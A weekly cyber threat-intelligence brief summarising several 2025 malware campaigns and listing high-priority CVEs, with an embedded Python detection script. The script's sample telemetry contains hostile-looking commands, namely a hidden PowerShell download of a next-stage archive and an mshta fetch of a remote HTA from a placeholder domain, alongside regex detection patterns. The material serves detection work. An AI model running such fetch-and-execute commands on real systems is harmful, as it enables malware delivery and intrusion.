
Weekly Cyber Round-up

Intelligence Report

April 3, 2025

ClickFake Interview campaign leverages fake crypto recruitment scheme to deliver GolangGhost

In February 2025, Sekoia researchers observed a campaign by the North Korean threat actor Lazarus Group, dubbed ClickFake Interview, targeting job seekers within the cryptocurrency industry. The campaign leverages fake job offers, legitimate job interview websites, and the ClickFix tactic to execute the GolangGhost backdoor and FrostyFerret. The infection chain varies by operating system, with both Windows and macOS systems targeted by the campaign. ClickFake Interview initially shares URLs on social media, inviting victims to a fake online cryptocurrency-related interview. Victims are required to create an introductory video using their camera, which displays an error message that instructs the user to download a driver. The user is then prompted to follow a ClickFix prompt to update their driver, with a VBScript used to download and execute the GolangGhost backdoor on Windows, while a bash script is used to execute FrostyFerret before launching GolangGhost on macOS. ClickFake Interview is believed to be a continuation of the Contagious Interview campaign.


RolandSkimmer campaign uses malicious browser extensions to steal financial data

Fortinet researchers observed a credit card skimming campaign, dubbed RolandSkimmer, targeting individuals in Bulgaria. The campaign leverages malicious browser extensions across Google Chrome, Microsoft Edge, and Firefox to harvest and exfiltrate sensitive financial data from users. The attack begins with a malicious ZIP file containing a deceptive LNK file, which deploys obfuscated VBScripts to establish persistent and covert access. The attacker then downloads additional files, with malicious JavaScript payloads and encoded RAR files used to install the malicious browser extensions, depending on the target browser. The attackers also replaced legitimate Microsoft Edge shortcuts in the Desktop and Taskbar with the malicious shortcuts.

Phishing campaigns distribute Grandoreiro banking trojan to Latin America and Europe

Forcepoint researchers observed a resurgence in Grandoreiro banking trojan activity, with the malware currently being distributed in large-scale phishing campaigns to banking users in Latin America and Europe. Threat actors leverage VPS hosting providers and obfuscation techniques to evade detection, as well as dynamic URLs and social engineering to maximize the malware’s reach and effectiveness. A recent campaign, targeting Mexico, Argentina, and Spain, impersonates tax agencies and uses fraudulent government emails to trick users. The emails are marked as high importance and contain malicious URLs that redirect users to the website of the Contabo hosting service, where they are prompted to download a PDF, which in turn downloads a ZIP file. The ZIP file leads victims to download an obfuscated VBScript and an EXE payload disguised as an Acrobat Reader error pop-up, designed to steal credentials.

Gamaredon targets Ukrainian users with war-related lures to deliver Remcos backdoor

Cisco Talos researchers discovered a suspected Gamaredon campaign, ongoing since at least November 2024, targeting Ukrainian users with malicious LNK files that ultimately deliver the Remcos backdoor. The LNK files are compressed inside ZIP archives and often disguised as Office documents, named using Russian words related to the movement of troops in Ukraine as a lure. The researchers believe that Gamaredon is likely maintaining its technique of sending phishing emails with the ZIP file attached or containing a URL link to download the file from a remote host. The LNK files contain PowerShell code that downloads and executes the next-stage payload in ZIP format, as well as a decoy file. The ZIP payload contains an executable binary that loads a malicious DLL via DLL sideloading, which in turn serves as the loader for Remcos.

First Ukrainian International Bank users targeted with Emmenhtal to deliver SmokeLoader

G DATA researchers discovered a campaign impersonating First Ukrainian International Bank to deliver the Emmenhtal malware loader to users. The malware was observed being chained with SmokeLoader, enabling the attackers to deploy additional malware dynamically using SmokeLoader’s modular capabilities. The campaign starts with an email claiming to confirm a payment has been made. The email contains a 7z archive file attachment with supposed payment instructions, which, once extracted, reveals a decoy PDF file and a PDF shortcut. The latter is used to download a file from a remote server that executes mshta via PowerShell to download Emmenhtal, which is later used to deploy SmokeLoader. 
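The Gamaredon and Emmenhtal summaries above both describe a shortcut-launched PowerShell step that fetches the next stage, and in the Emmenhtal chain PowerShell then spawns mshta to pull a remote file. The following is an added example, not code from this brief or from the cited researchers, showing how a defender might turn those described steps into process-lineage detection logic and run it over constructed telemetry. The event schema, rule names, and sample events are all assumptions made for illustration; example.invalid is a reserved, non-resolving domain.

```python
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record. The field names are an assumption of
    this example, not a real telemetry schema."""
    host: str
    parent: str   # parent process image path
    image: str    # created process image path
    cmdline: str  # full command line


# Indicators drawn from the chains described in the brief: PowerShell fetching
# a next stage, and mshta being used to pull a remote file.
DOWNLOAD_CMDLET = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer", re.I)
REMOTE_URL = re.compile(r"https?://", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.lower().rsplit("\\", 1)[-1]


def is_powershell(path: str) -> bool:
    return basename(path) in ("powershell.exe", "pwsh.exe")


def check_event(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event matches (empty if benign)."""
    findings: list[str] = []
    # A double-clicked LNK runs its target with explorer.exe as parent (assumed
    # launch path); flag PowerShell children of explorer that reach out for a payload.
    if is_powershell(ev.image) and basename(ev.parent) == "explorer.exe" \
            and DOWNLOAD_CMDLET.search(ev.cmdline):
        tag = "explorer_powershell_download"
        if HIDDEN_WINDOW.search(ev.cmdline):
            tag += "+hidden_window"
        findings.append(tag)
    # mshta launched by PowerShell with a remote URL mirrors the Emmenhtal chain.
    if basename(ev.image) == "mshta.exe" and is_powershell(ev.parent) \
            and REMOTE_URL.search(ev.cmdline):
        findings.append("powershell_spawns_mshta_remote")
    return findings


def scan(events: list[ProcEvent]) -> dict[str, list[str]]:
    """Map 'host:index' to findings for every event that triggered a rule."""
    hits: dict[str, list[str]] = {}
    for i, ev in enumerate(events):
        found = check_event(ev)
        if found:
            hits[f"{ev.host}:{i}"] = found
    return hits


# Constructed sample telemetry (not from any real incident).
SAMPLE_EVENTS = [
    ProcEvent("ws01", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -w hidden -c "Invoke-WebRequest http://example.invalid/stage2.zip -OutFile $env:TEMP\stage2.zip"'),
    ProcEvent("ws01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\mshta.exe",
              r"mshta.exe http://example.invalid/loader.hta"),
    ProcEvent("ws02", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -c "Get-Date"'),
    ProcEvent("ws02", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Tools\local.hta"),
]

if __name__ == "__main__":
    for key, findings in scan(SAMPLE_EVENTS).items():
        print(key, findings)
```

Only the first two constructed events trigger a rule; the benign PowerShell child of explorer and the locally sourced mshta run stay quiet, which is the point of keying on parent lineage plus a remote-fetch indicator rather than on the image name alone.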

High Priority Vulnerabilities

Name            Software                    Base Score   Temp Score
CVE-2025-0282   Neurons for ZTA gateways    9.0          7.7
  Related: RESURGE malware used to create web shells following Ivanti Connect Secure compromise
CVE-2024-20439  Smart License Utility       9.8          9.4
  Related: CISA Warns of Active Exploitation of Cisco Smart Licensing Utility Flaw
CVE-2024-31982  xwiki-platform-search-ui    9.8          7.0
  Related: Exploit attempts observed targeting XWiki OS command injection flaw
CVE-2020-8515   Vigor300B                   9.8          9.8
  Related: Targeting of DrayTek routers observed amidst reports of reboots
CVE-2025-24201  macOS                       8.8          6.0
  Related: Apple patches multiple zero-day flaws in iPhone, iPads, and macOS Sonoma
